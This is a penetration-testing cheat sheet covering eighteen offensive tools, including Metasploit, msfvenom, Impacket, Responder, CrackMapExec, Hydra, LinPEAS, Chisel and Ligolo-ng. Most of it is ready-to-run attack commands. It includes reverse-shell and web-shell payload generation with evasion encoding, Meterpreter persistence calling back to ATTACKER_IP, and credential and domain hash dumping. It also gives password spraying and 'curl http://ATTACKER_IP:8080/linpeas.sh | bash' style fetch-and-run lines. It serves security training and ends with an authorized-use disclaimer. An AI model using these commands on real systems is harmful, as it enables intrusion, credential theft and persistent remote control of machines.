Tool Reference

Cheat sheets for the major tools used in ethical hacking and penetration testing. Each entry covers the tool's purpose, essential commands, common use cases, and practical tips.

Table of Contents

1. Nmap
2. Burp Suite
3. Metasploit / msfconsole
4. Hashcat
5. John the Ripper
6. sqlmap
7. Gobuster / ffuf
8. Nikto
9. Wireshark / tshark
10. BloodHound
11. Impacket
12. Responder
13. CrackMapExec / NetExec
14. Hydra
15. enum4linux / enum4linux-ng
16. LinPEAS / WinPEAS
17. Chisel
18. Ligolo-ng

1. Nmap

Purpose: Network discovery and security auditing. The most widely used port scanner and network reconnaissance tool.

Essential Scan Types

# Host discovery (ping sweep)
nmap -sn 192.168.1.0/24

# TCP SYN scan (default for root, fast and stealthy)
nmap -sS 192.168.1.10

# TCP connect scan (no root required)
nmap -sT 192.168.1.10

# UDP scan (slow but important)
nmap -sU 192.168.1.10

# Service version detection
nmap -sV 192.168.1.10

# OS detection
nmap -O 192.168.1.10

# Aggressive scan (OS, version, scripts, traceroute)
nmap -A 192.168.1.10

# Default scripts
nmap -sC 192.168.1.10

# Combined: SYN scan + version + scripts
nmap -sS -sV -sC 192.168.1.10

Port Specification

# Specific ports
nmap -p 80,443,8080 TARGET

# Port range
nmap -p 1-1024 TARGET

# All ports
nmap -p- TARGET

# Top N ports
nmap --top-ports 100 TARGET

# Specific TCP and UDP ports
nmap -sS -sU -p T:80,443,U:53,161 TARGET

NSE (Nmap Scripting Engine)

# Run a specific script
nmap --script=http-enum TARGET

# Run multiple scripts
nmap --script=smb-vuln-ms17-010,smb-os-discovery TARGET

# Run script category
nmap --script=vuln TARGET

# Script with arguments
nmap --script=http-brute --script-args http-brute.path=/admin TARGET

# Useful script categories: auth, broadcast, brute, default,
#   discovery, dos, exploit, external, fuzzer, intrusive,
#   malware, safe, version, vuln

Output Options

# Normal output
nmap -oN scan.txt TARGET

# XML output (for parsing)
nmap -oX scan.xml TARGET

# Grepable output
nmap -oG scan.gnmap TARGET

# All formats
nmap -oA scan_results TARGET

Performance Tuning

# Timing templates (T0=paranoid to T5=insane)
nmap -T4 TARGET

# Min/max rate
nmap --min-rate 1000 TARGET

# Max retries
nmap --max-retries 1 TARGET

# Parallel host groups
nmap --min-hostgroup 64 TARGET

Tips

• Always start with -sn for host discovery before full port scans
• Use -p- (all ports) when thoroughness matters; many services hide on non-standard ports
• Save XML output (-oX) for importing into other tools
• The -sV flag with --version-intensity 5 gives more accurate version detection
• Combine -sS -sV -sC -O -p- for a comprehensive initial scan

2. Burp Suite

Purpose: Integrated platform for web application security testing. Intercepts, modifies, and replays HTTP/HTTPS traffic.

Proxy Setup

Browser proxy: 127.0.0.1:8080
Install Burp CA cert: http://burpsuite (with proxy enabled)
Firefox recommended (supports per-browser proxy settings)

Key Modules

Intruder Attack Types

Useful Shortcuts

Ctrl+R       Send to Repeater
Ctrl+I       Send to Intruder
Ctrl+Shift+T Toggle intercept
Ctrl+F       Forward intercepted request
Ctrl+D       Drop intercepted request

Tips

• Configure scope early to filter noise (Target > Scope)
• Use "Match and Replace" rules in Proxy settings to auto-modify requests
• In Intruder, use "Grep - Extract" to pull specific data from responses
• Enable "Passive scanning" (Pro) to find vulnerabilities as you browse
• Export findings as HTML reports for documentation

3. Metasploit / msfconsole

Purpose: Exploitation framework providing exploit modules, payloads, encoders, and post-exploitation tools.

Core Commands

# Launch
msfconsole

# Search for modules
search type:exploit platform:windows smb
search cve:2021-44228

# Select and configure a module
use exploit/windows/smb/ms17_010_eternalblue
show options
set RHOSTS 192.168.1.10
set LHOST 192.168.1.5
set LPORT 4444

# Run the exploit
exploit
# or
run

# Background a session
background
# or Ctrl+Z

# List active sessions
sessions -l

# Interact with a session
sessions -i 1

Module Types

Common Payloads

# Reverse TCP Meterpreter (most common)
set PAYLOAD windows/x64/meterpreter/reverse_tcp

# Staged vs. Stageless
windows/meterpreter/reverse_tcp    # Staged (smaller, two parts)
windows/meterpreter_reverse_tcp    # Stageless (single, larger)

# Linux payloads
linux/x64/meterpreter/reverse_tcp
linux/x64/shell_reverse_tcp

# Web payloads
php/meterpreter/reverse_tcp
java/meterpreter/reverse_tcp

Meterpreter Commands

# System info
sysinfo
getuid
getpid

# File operations
upload /local/path /remote/path
download /remote/path /local/path
cat /etc/shadow
ls
cd

# Privilege escalation
getsystem
run post/multi/recon/local_exploit_suggester

# Network
ipconfig / ifconfig
route
portfwd add -l 8080 -p 80 -r 10.0.0.5

# Credential harvesting
hashdump
run post/windows/gather/credentials/credential_collector
load kiwi    # Mimikatz
creds_all

# Persistence
run persistence -U -i 60 -p 4444 -r ATTACKER_IP

# Pivoting
run autoroute -s 10.0.0.0/24

Msfvenom (Payload Generation)

# Windows reverse shell EXE
msfvenom -p windows/x64/meterpreter/reverse_tcp \
  LHOST=10.10.14.5 LPORT=4444 -f exe -o shell.exe

# Linux ELF
msfvenom -p linux/x64/meterpreter/reverse_tcp \
  LHOST=10.10.14.5 LPORT=4444 -f elf -o shell.elf

# PHP web shell
msfvenom -p php/meterpreter/reverse_tcp \
  LHOST=10.10.14.5 LPORT=4444 -f raw -o shell.php

# Python payload
msfvenom -p python/meterpreter/reverse_tcp \
  LHOST=10.10.14.5 LPORT=4444 -f raw -o shell.py

# ASP web shell
msfvenom -p windows/meterpreter/reverse_tcp \
  LHOST=10.10.14.5 LPORT=4444 -f asp -o shell.asp

# War file (Tomcat)
msfvenom -p java/jsp_shell_reverse_tcp \
  LHOST=10.10.14.5 LPORT=4444 -f war -o shell.war

# Shellcode (C format)
msfvenom -p windows/x64/shell_reverse_tcp \
  LHOST=10.10.14.5 LPORT=4444 -f c

# With encoding for evasion
msfvenom -p windows/x64/meterpreter/reverse_tcp \
  LHOST=10.10.14.5 LPORT=4444 \
  -e x64/xor_dynamic -i 5 -f exe -o encoded.exe

Tips

• Use db_nmap to import Nmap results directly into Metasploit's database
• search accepts filters: type:, platform:, name:, cve:, rank:
• Always set LHOST to your tun0/VPN interface IP for remote targets
• Use exploit -j to run exploits as background jobs
• The resource command runs script files for automation

4. Hashcat

Purpose: High-performance password recovery tool using GPU acceleration. Supports 300+ hash types.

Basic Usage

# Basic dictionary attack
hashcat -m 0 hashes.txt /usr/share/wordlists/rockyou.txt

# Show cracked passwords
hashcat -m 0 hashes.txt --show

# Output to file
hashcat -m 0 hashes.txt wordlist.txt -o cracked.txt

Common Hash Modes (-m)

Attack Modes (-a)

# Dictionary attack (default)
hashcat -m 1000 -a 0 hashes.txt wordlist.txt

# Combination attack (word1+word2)
hashcat -m 1000 -a 1 hashes.txt list1.txt list2.txt

# Brute force / mask attack
hashcat -m 1000 -a 3 hashes.txt ?u?l?l?l?d?d?d?d
# ?l = lowercase, ?u = uppercase, ?d = digit
# ?s = special, ?a = all, ?b = binary

# Rule-based attack
hashcat -m 1000 -a 0 hashes.txt wordlist.txt \
  -r /usr/share/hashcat/rules/best64.rule

# Hybrid: wordlist + mask
hashcat -m 1000 -a 6 hashes.txt wordlist.txt ?d?d?d?d
hashcat -m 1000 -a 7 hashes.txt ?d?d?d?d wordlist.txt

Tips

• Always use --potfile-disable in CTF/exam scenarios to avoid caching issues
• Use -O (optimized kernels) for faster cracking on supported hash types
• Use -w 3 for workload high (warning: system may become unresponsive)
• The --username flag handles hash files with user:hash format
• Check hashcat --example-hashes to identify unknown hash types

5. John the Ripper

Purpose: Open-source password cracker supporting many hash and cipher types. CPU-based with broad format support.

Basic Usage

# Auto-detect hash type and crack
john hashes.txt

# Specify format
john --format=raw-md5 hashes.txt

# Use specific wordlist
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt

# Show cracked passwords
john --show hashes.txt

# Show cracked for specific format
john --show --format=raw-md5 hashes.txt

Hash Extraction Tools (john suite)

# Extract hashes from various file types
zip2john protected.zip > zip_hash.txt
rar2john protected.rar > rar_hash.txt
pdf2john protected.pdf > pdf_hash.txt
ssh2john id_rsa > ssh_hash.txt
keepass2john database.kdbx > keepass_hash.txt
office2john document.docx > office_hash.txt
gpg2john private.gpg > gpg_hash.txt
bitlocker2john image.dd > bitlocker_hash.txt

# Then crack
john --wordlist=rockyou.txt zip_hash.txt

Rules and Modes

# Single crack mode (uses username mangling)
john --single hashes.txt

# Incremental (brute force)
john --incremental hashes.txt

# Rules
john --wordlist=wordlist.txt --rules=best64 hashes.txt
john --wordlist=wordlist.txt --rules=KoreLogic hashes.txt

# Custom rules (in john.conf)
# [List.Rules:MyRules]
# Az"[0-9][0-9]"    # Append 2 digits
# c                   # Capitalize first letter
# $[!@#$%]           # Append special char

Tips

• John auto-detects most hash formats, but explicit --format is more reliable
• Use john --list=formats to see all supported formats
• The .pot file (~/.john/john.pot) stores all cracked hashes persistently
• unshadow /etc/passwd /etc/shadow > combined.txt merges Linux credential files
• John complements Hashcat: use John for CPU cracking and file formats, Hashcat for GPU speed

6. sqlmap

Purpose: Automated SQL injection detection and exploitation tool.

Basic Usage

# Test a URL parameter
sqlmap -u "http://target.com/page?id=1"

# Test POST parameter
sqlmap -u "http://target.com/login" --data="user=admin&pass=test"

# Specify parameter to test
sqlmap -u "http://target.com/page?id=1&cat=5" -p id

# Use a request file (from Burp Suite: right-click > Save item)
sqlmap -r request.txt

Enumeration

# Get current database
sqlmap -u URL --current-db

# List all databases
sqlmap -u URL --dbs

# List tables in a database
sqlmap -u URL -D database_name --tables

# Dump specific table
sqlmap -u URL -D database_name -T users --dump

# Dump specific columns
sqlmap -u URL -D database_name -T users -C username,password --dump

# Get current user
sqlmap -u URL --current-user

# Check if DBA
sqlmap -u URL --is-dba

# List all users and passwords
sqlmap -u URL --passwords

Advanced Options

# Specify DBMS
sqlmap -u URL --dbms=mysql

# Specify injection technique
# B=Boolean, E=Error, U=Union, S=Stacked, T=Time, Q=Inline
sqlmap -u URL --technique=BEU

# OS shell (if DBA and stacked queries)
sqlmap -u URL --os-shell

# SQL shell
sqlmap -u URL --sql-shell

# File read/write
sqlmap -u URL --file-read="/etc/passwd"
sqlmap -u URL --file-write="shell.php" --file-dest="/var/www/html/shell.php"

# WAF bypass
sqlmap -u URL --tamper=space2comment,between

# Increase level and risk
sqlmap -u URL --level=5 --risk=3

# Use cookies / authentication
sqlmap -u URL --cookie="PHPSESSID=abc123"
sqlmap -u URL --headers="Authorization: Bearer TOKEN"

# Batch mode (auto-answer yes)
sqlmap -u URL --batch

Tips

• Start with --batch --smart for quick initial assessment
• Save request from Burp Suite (-r request.txt) for complex requests with cookies/headers
• Use --level=5 --risk=3 when initial tests find nothing but you suspect SQLi
• Use --tamper scripts to bypass WAFs (list with sqlmap --list-tampers)
• The --wizard flag provides interactive guidance for beginners

7. Gobuster / ffuf

Purpose: Directory and file brute forcing on web servers. ffuf also supports fuzzing parameters, headers, and virtual hosts.

Gobuster

# Directory brute force
gobuster dir -u http://target.com -w /usr/share/wordlists/dirb/common.txt

# With file extensions
gobuster dir -u http://target.com \
  -w /usr/share/wordlists/dirb/common.txt \
  -x php,html,txt,bak

# Filter by status code
gobuster dir -u http://target.com -w wordlist.txt \
  -s "200,204,301,302,307"

# Increase threads
gobuster dir -u http://target.com -w wordlist.txt -t 50

# With authentication
gobuster dir -u http://target.com -w wordlist.txt \
  -U admin -P password

# DNS subdomain enumeration
gobuster dns -d target.com -w subdomains.txt

# Virtual host enumeration
gobuster vhost -u http://target.com -w wordlist.txt

ffuf (Fuzz Faster U Fool)

# Directory fuzzing (FUZZ keyword marks injection point)
ffuf -u http://target.com/FUZZ -w wordlist.txt

# With extensions
ffuf -u http://target.com/FUZZ \
  -w wordlist.txt \
  -e .php,.html,.txt,.bak

# Filter by status code
ffuf -u http://target.com/FUZZ -w wordlist.txt -fc 404

# Filter by response size
ffuf -u http://target.com/FUZZ -w wordlist.txt -fs 1234

# Filter by word count
ffuf -u http://target.com/FUZZ -w wordlist.txt -fw 42

# Virtual host fuzzing
ffuf -u http://target.com -H "Host: FUZZ.target.com" \
  -w subdomains.txt -fs 1234

# POST parameter fuzzing
ffuf -u http://target.com/login \
  -X POST -d "user=admin&pass=FUZZ" \
  -w passwords.txt -fc 401

# Multi-keyword fuzzing (e.g., username:password)
ffuf -u http://target.com/login \
  -X POST -d "user=USER&pass=PASS" \
  -w users.txt:USER -w passwords.txt:PASS \
  -fc 401

# Recursive scanning
ffuf -u http://target.com/FUZZ -w wordlist.txt -recursion -recursion-depth 2

# With cookies
ffuf -u http://target.com/FUZZ -w wordlist.txt -b "session=abc123"

# Output to file
ffuf -u http://target.com/FUZZ -w wordlist.txt -o results.json -of json

Tips

• ffuf is generally faster and more flexible than Gobuster for web fuzzing
• Use SecLists wordlists: /usr/share/seclists/Discovery/Web-Content/
• Always filter results (-fc, -fs, -fw) to remove noise
• For virtual host fuzzing, first find the default response size and filter it out
• Use -rate flag in ffuf to limit requests per second and avoid detection

8. Nikto

Purpose: Open-source web server scanner that checks for dangerous files, outdated software, and misconfigurations.

Basic Usage

# Basic scan
nikto -h http://target.com

# Scan specific port
nikto -h target.com -p 8080

# Multiple ports
nikto -h target.com -p 80,443,8080

# Save output
nikto -h target.com -o report.html -Format html

# SSL scan
nikto -h https://target.com -ssl

# Use proxy (Burp)
nikto -h target.com -useproxy http://127.0.0.1:8080

# Specific tuning (test types)
nikto -h target.com -Tuning 1234
# 1=Files, 2=Misconfig, 3=Info, 4=Injection(XSS/Script),
# 5=Remote retrieval, 6=DoS, 7=Remote retrieval,
# 8=Command execution, 9=SQL injection, 0=File upload

Tips

• Nikto is noisy and easily detected; use it for initial reconnaissance, not stealth
• Combine with Nmap service detection to target specific web servers
• Update signatures before scanning: nikto -update
• Use -Cgidirs all to scan all CGI directories

9. Wireshark / tshark

Purpose: Network protocol analyzer for capturing and interactively displaying network traffic at the packet level.

Wireshark Display Filters

# Filter by IP
ip.addr == 192.168.1.10
ip.src == 192.168.1.10
ip.dst == 10.0.0.1

# Filter by protocol
tcp
udp
http
dns
smb
ftp

# Filter by port
tcp.port == 80
tcp.dstport == 443
udp.port == 53

# HTTP filters
http.request.method == "POST"
http.request.uri contains "login"
http.response.code == 200
http.host == "target.com"

# TCP flags
tcp.flags.syn == 1
tcp.flags.reset == 1
tcp.flags.fin == 1

# String search in packets
frame contains "password"
tcp contains "admin"

# Follow TCP stream
Right-click packet > Follow > TCP Stream

# Credentials in cleartext
ftp.request.command == "PASS"
http.authbasic
smtp.req.parameter contains "@"

tshark (Command-line Wireshark)

# Capture packets
tshark -i eth0 -w capture.pcap

# Read capture file
tshark -r capture.pcap

# Filter while capturing
tshark -i eth0 -f "tcp port 80" -w http_traffic.pcap

# Display filter on existing capture
tshark -r capture.pcap -Y "http.request.method == POST"

# Extract specific fields
tshark -r capture.pcap -Y "http" \
  -T fields -e ip.src -e http.host -e http.request.uri

# Extract HTTP objects (files)
tshark -r capture.pcap --export-objects http,exported_files/

# Statistics
tshark -r capture.pcap -z conv,tcp
tshark -r capture.pcap -z io,stat,1

# Credential extraction
tshark -r capture.pcap -Y "ftp.request.command == PASS" \
  -T fields -e ftp.request.arg

Tips

• Use capture filters (-f) to limit what is recorded and display filters (-Y) to search existing captures
• "Follow TCP Stream" is the fastest way to reconstruct a conversation
• Export HTTP objects (File > Export Objects > HTTP) to extract transferred files
• Use Statistics > Conversations to identify the most active connections
• Statistics > Protocol Hierarchy gives a quick overview of traffic composition

10. BloodHound

Purpose: Active Directory attack path mapping tool using graph theory to reveal relationships and privilege escalation paths.

Data Collection (SharpHound)

# PowerShell collector
Import-Module .\SharpHound.ps1
Invoke-BloodHound -CollectionMethod All -OutputDirectory C:\temp

# Executable collector
.\SharpHound.exe -c All --outputdirectory C:\temp

# Collection methods: Default, Group, LocalAdmin, Session,
#   Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets,
#   PSRemote, All

# Stealthy collection (slower, less noise)
.\SharpHound.exe -c DCOnly

# From Linux (bloodhound-python)
bloodhound-python -u 'user' -p 'password' -d domain.local \
  -ns 192.168.1.1 -c All

Key Queries in BloodHound GUI

# Pre-built queries (Analysis tab):
- Find all Domain Admins
- Shortest Paths to Domain Admins from Owned Principals
- Find Computers where Domain Users are Local Admin
- Shortest Paths to High Value Targets
- Find All Kerberoastable Users
- Find All AS-REP Roastable Users
- Shortest Paths from Owned Principals

# Custom Cypher queries:
# Find users with DCSync rights
MATCH (n:User)-[:MemberOf*1..]->(g:Group)-[:DCSync|GetChanges|GetChangesAll]->(d:Domain)
RETURN n.name, g.name

# Find computers with unconstrained delegation
MATCH (c:Computer {unconstraineddelegation:true})
RETURN c.name

Tips

• Mark owned users/computers in the GUI to highlight available attack paths
• Focus on "Shortest Paths to Domain Admins" after obtaining initial credentials
• Run SharpHound from an authenticated user context for best results
• Re-collect data periodically as sessions and group memberships change
• Use the "Node Info" panel to see detailed properties and group memberships

11. Impacket

Purpose: Collection of Python tools for working with network protocols, focused on Windows/Active Directory penetration testing.

Key Tools

# Remote command execution
psexec.py domain/user:password@target
smbexec.py domain/user:password@target
wmiexec.py domain/user:password@target
atexec.py domain/user:password@target "whoami"
dcomexec.py domain/user:password@target

# Pass-the-hash
psexec.py -hashes :NTLM_HASH domain/user@target
wmiexec.py -hashes LM:NTLM domain/user@target

# Hash dumping
secretsdump.py domain/user:password@target
secretsdump.py -just-dc domain/user:password@DC_IP  # DCSync

# Kerberos attacks
GetUserSPNs.py domain/user:password -dc-ip DC_IP -request  # Kerberoast
GetNPUsers.py domain/ -usersfile users.txt -dc-ip DC_IP    # AS-REP Roast

# SMB operations
smbclient.py domain/user:password@target
smbserver.py SHARE /path/to/share  # Start SMB server

# Ticket operations
getTGT.py domain/user:password -dc-ip DC_IP
getST.py -spn MSSQLSvc/sql.domain.local domain/user -dc-ip DC_IP
ticketConverter.py ticket.kirbi ticket.ccache

# NTLM relay
ntlmrelayx.py -tf targets.txt -smb2support
ntlmrelayx.py -t ldap://DC_IP --delegate-access

# MSSql client
mssqlclient.py domain/user:password@target -windows-auth

Tips

• Use -k flag for Kerberos authentication when you have tickets
• Set KRB5CCNAME environment variable to point to your .ccache file
• secretsdump.py with -just-dc-ntlm is faster when you only need NTLM hashes
• smbserver.py is invaluable for exfiltrating files from compromised Windows hosts
• When psexec fails, try wmiexec or smbexec as alternatives

12. Responder

Purpose: LLMNR, NBT-NS, and mDNS poisoner for capturing NTLMv2 hashes on a local network.

Basic Usage

# Start Responder on interface
sudo responder -I eth0

# Analyze mode (listen only, no poisoning)
sudo responder -I eth0 -A

# Disable specific servers
sudo responder -I eth0 -r -d -w
# -r: disable answers for netbios wredir
# -d: disable answers for netbios domain
# -w: start WPAD rogue proxy

# Force WPAD authentication
sudo responder -I eth0 -wFb

# Enable verbose mode
sudo responder -I eth0 -v

Hash Location

# Captured hashes stored in:
/usr/share/responder/logs/

# Hash format (NTLMv2):
username::domain:challenge:response:blob

# Crack with hashcat
hashcat -m 5600 hashes.txt wordlist.txt

Tips

• Run Responder during the first few minutes of an internal pentest for quick wins
• Combine with ntlmrelayx.py for relay attacks instead of just capturing hashes
• Use -A (analyze) first to understand the network before poisoning
• Captured hashes are NTLMv2 (mode 5600 in hashcat)
• Check the Responder.conf file to enable/disable specific servers (HTTP, SMB, etc.)

13. CrackMapExec / NetExec

Purpose: Swiss army knife for pentesting Windows/Active Directory networks. Automates enumeration, credential testing, and command execution across multiple hosts.

Basic Enumeration

# SMB enumeration
crackmapexec smb 192.168.1.0/24
crackmapexec smb 192.168.1.0/24 -u '' -p ''  # Null session
crackmapexec smb 192.168.1.0/24 -u 'guest' -p ''  # Guest

# Authenticate and enumerate
crackmapexec smb 192.168.1.0/24 -u user -p password
crackmapexec smb 192.168.1.0/24 -u user -p password --shares
crackmapexec smb 192.168.1.0/24 -u user -p password --users
crackmapexec smb 192.168.1.0/24 -u user -p password --groups
crackmapexec smb 192.168.1.0/24 -u user -p password --sessions
crackmapexec smb 192.168.1.0/24 -u user -p password --loggedon-users

Credential Testing

# Password spraying
crackmapexec smb targets.txt -u users.txt -p 'Password1'

# Pass-the-hash
crackmapexec smb 192.168.1.0/24 -u admin -H NTLM_HASH

# Test credentials across protocols
crackmapexec smb targets.txt -u user -p pass
crackmapexec winrm targets.txt -u user -p pass
crackmapexec mssql targets.txt -u user -p pass
crackmapexec rdp targets.txt -u user -p pass

Command Execution

# Execute commands
crackmapexec smb target -u admin -p pass -x "whoami"
crackmapexec smb target -u admin -p pass -X "Get-Process"  # PowerShell

# Dump SAM hashes
crackmapexec smb target -u admin -p pass --sam

# Dump LSA secrets
crackmapexec smb target -u admin -p pass --lsa

# Dump NTDS (Domain Controller)
crackmapexec smb DC_IP -u admin -p pass --ntds

Tips

• Pwn3d! in the output means you have local admin access on the target
• Use --continue-on-success with password spraying to find all valid accounts
• Use --local-auth to test local accounts instead of domain accounts
• CrackMapExec has been rebranded as NetExec (nxc) in newer versions
• The --gen-relay-list option generates a list of hosts without SMB signing for NTLM relay

14. Hydra

Purpose: Fast parallelized network login cracker supporting over 50 protocols.

Common Usage

# SSH brute force
hydra -l admin -P wordlist.txt ssh://192.168.1.10

# FTP brute force
hydra -l admin -P wordlist.txt ftp://192.168.1.10

# HTTP POST form
hydra -l admin -P wordlist.txt \
  192.168.1.10 http-post-form \
  "/login:user=^USER^&pass=^PASS^:Invalid credentials"

# HTTP Basic Auth
hydra -l admin -P wordlist.txt \
  192.168.1.10 http-get /admin

# RDP
hydra -l admin -P wordlist.txt rdp://192.168.1.10

# SMB
hydra -l admin -P wordlist.txt smb://192.168.1.10

# MySQL
hydra -l root -P wordlist.txt mysql://192.168.1.10

# Multiple users and passwords
hydra -L users.txt -P passwords.txt ssh://192.168.1.10

# Specific port
hydra -l admin -P wordlist.txt -s 2222 ssh://192.168.1.10

# Limit threads and wait time
hydra -l admin -P wordlist.txt -t 4 -W 1 ssh://192.168.1.10

HTTP Form Syntax

http-post-form "/path:BODY:FAILURE_STRING"
  ^USER^ = username placeholder
  ^PASS^ = password placeholder
  Third field = string that appears on FAILED login

# Example with cookie
hydra -l admin -P wordlist.txt 192.168.1.10 \
  http-post-form "/login.php:user=^USER^&pass=^PASS^:Login failed:H=Cookie: session=abc"

Tips

• Use -t to control threads (default 16); too many threads can cause false negatives
• The failure string must be unique to failed login attempts
• Use -V for verbose mode to see each attempt
• Use -f to stop after the first successful login
• For HTTP forms, use Burp Suite to capture the exact POST parameters first

15. enum4linux / enum4linux-ng

Purpose: Tool for enumerating information from Windows and Samba systems via SMB.

Basic Usage

# Full enumeration
enum4linux -a 192.168.1.10

# Specific enumerations
enum4linux -U 192.168.1.10   # Users
enum4linux -S 192.168.1.10   # Shares
enum4linux -G 192.168.1.10   # Groups
enum4linux -P 192.168.1.10   # Password policy
enum4linux -o 192.168.1.10   # OS information

# With credentials
enum4linux -u user -p password -a 192.168.1.10

# enum4linux-ng (Python rewrite, recommended)
enum4linux-ng -A 192.168.1.10
enum4linux-ng -u user -p pass -A 192.168.1.10
enum4linux-ng -A 192.168.1.10 -oJ output.json

Tips

• enum4linux-ng provides better output formatting and JSON export
• Null sessions may not work on modern Windows; use authenticated scans when possible
• The -a flag runs all enumeration tests
• Combine with CrackMapExec for more thorough SMB enumeration

16. LinPEAS / WinPEAS

Purpose: Automated privilege escalation enumeration scripts for Linux and Windows.

LinPEAS

# Transfer to target
# On attacker: python3 -m http.server 8080
# On target:
curl http://ATTACKER_IP:8080/linpeas.sh | bash
# or
wget http://ATTACKER_IP:8080/linpeas.sh -O /tmp/linpeas.sh
chmod +x /tmp/linpeas.sh
/tmp/linpeas.sh

# Save output
./linpeas.sh | tee linpeas_output.txt

# Run specific checks only
./linpeas.sh -s    # Superfast (less checks)
./linpeas.sh -P    # Password checks
./linpeas.sh -o    # Only linpeas checks (no external tools)

WinPEAS

# Transfer and execute
certutil.exe -urlcache -split -f http://ATTACKER_IP/winPEASx64.exe C:\temp\winpeas.exe
C:\temp\winpeas.exe

# Run from memory (PowerShell)
IEX(New-Object Net.WebClient).DownloadString('http://ATTACKER_IP/winPEAS.ps1')

# Specific checks
winpeas.exe servicesinfo
winpeas.exe userinfo
winpeas.exe systeminfo

Color-Coded Output

Tips

• Save output to a file for later analysis (piping through tee)
• Red/Yellow highlights are your priority findings
• On restricted systems where you cannot upload files, use the shell script version (LinPEAS) or inline PowerShell (WinPEAS)
• Always cross-reference findings manually; automated tools miss context-dependent vectors
• Use alongside manual enumeration (GTFOBins for Linux, LOLBAS for Windows)

17. Chisel

Purpose: Fast TCP/UDP tunnel over HTTP, secured via SSH. Used for port forwarding and pivoting through firewalls.

Setup

# On attacker (server mode)
./chisel server --reverse --port 8080

# On target (client mode) — reverse port forward
./chisel client ATTACKER_IP:8080 R:ATTACKER_PORT:TARGET_IP:TARGET_PORT

# Example: Forward target's internal port 3389 to attacker's port 3389
./chisel client 10.10.14.5:8080 R:3389:127.0.0.1:3389

# SOCKS proxy
# Server:
./chisel server --reverse --port 8080
# Client:
./chisel client 10.10.14.5:8080 R:socks

# Then use proxychains with socks5://127.0.0.1:1080

Common Scenarios

# Forward local port to remote service through pivot
# Attacker:
./chisel server --reverse -p 9001
# Pivot host:
./chisel client ATTACKER:9001 R:8888:INTERNAL_HOST:80

# Access internal service at attacker's localhost:8888

# Multiple tunnels
./chisel client ATTACKER:9001 \
  R:3306:DB_SERVER:3306 \
  R:445:DC:445 \
  R:socks

Tips

• Chisel is a single binary, making it easy to transfer to compromised hosts
• Use R:socks for a dynamic SOCKS proxy through the compromised host
• Configure /etc/proxychains4.conf to use socks5 127.0.0.1 1080
• Chisel uses HTTP, making it firewall-friendly
• Compile for the target OS: GOOS=windows go build or use pre-built releases

18. Ligolo-ng

Purpose: Advanced tunneling/pivoting tool that creates a user-mode network interface, making pivoted networks feel like local networks.

Setup

# On attacker (proxy)
sudo ip tuntap add user $USER mode tun ligolo
sudo ip link set ligolo up
./proxy -selfcert -laddr 0.0.0.0:11601

# On target (agent)
./agent -connect ATTACKER_IP:11601 -ignore-cert

Usage

# In the proxy interface:
# List sessions
session

# Select a session
session      # then enter the number

# Start tunnel
start

# Add route to internal network
sudo ip route add 10.10.10.0/24 dev ligolo

# Now scan/access 10.10.10.0/24 directly from your machine!
nmap -sV 10.10.10.50

Listeners (Reverse Connections Through Pivot)

# In proxy interface:
listener_add --addr 0.0.0.0:4444 --to 127.0.0.1:4444

# This forwards connections from pivot:4444 to attacker:4444
# Useful for receiving reverse shells from deeper network segments

Tips

• Ligolo-ng is superior to SOCKS-based pivoting because all tools work natively (no proxychains needed)
• The tun interface makes the pivoted network appear local to your machine
• Transfer the agent binary to each compromised host in the chain for multi-hop pivoting
• Use listener_add to catch reverse shells through multiple network layers
• Agent binaries are available for Windows, Linux, and macOS

All tools referenced in this appendix should only be used on systems you own or have explicit written authorization to test. Unauthorized use of these tools against systems you do not own is illegal and unethical.